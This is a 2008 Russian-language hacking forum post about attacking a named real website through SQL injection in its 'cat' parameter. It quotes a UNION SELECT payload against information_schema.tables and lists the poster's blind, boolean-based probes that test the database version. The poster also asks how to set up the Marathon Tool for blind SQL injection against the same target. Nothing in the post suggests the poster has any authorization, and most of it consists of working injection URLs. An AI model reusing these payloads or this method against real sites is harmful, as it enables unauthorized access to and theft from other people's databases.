08.12.2008, 18:34
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
http://smartlip.com/symbian/fileshare/flist.php?cat=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +information_schema.tables--%20%201
слепая скул
Спасибо! Не подскажите, если вы пользовались прогой Marathon Tool (как раз для blind-SQL), то там в поле "Target base URL" нужно вводить просто http://smartlip.com/symbian/fileshare/flist.php?cat=1 или http://smartlip.com/symbian/fileshare/flist.php?cat=-1' ?
А то что то я вручную найти таблицы не смог, да и прога почему то не хочет 
Для определения БД пробовал такие варианты:
Код:
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)>1--%20%201
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)<5--%20%201
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)=5--%20%201
И во всех результатах ничего не выводится, точнее ошибок не выводится..
Последний раз редактировалось Thrasher88; 08.12.2008 в 19:04..
|
|
|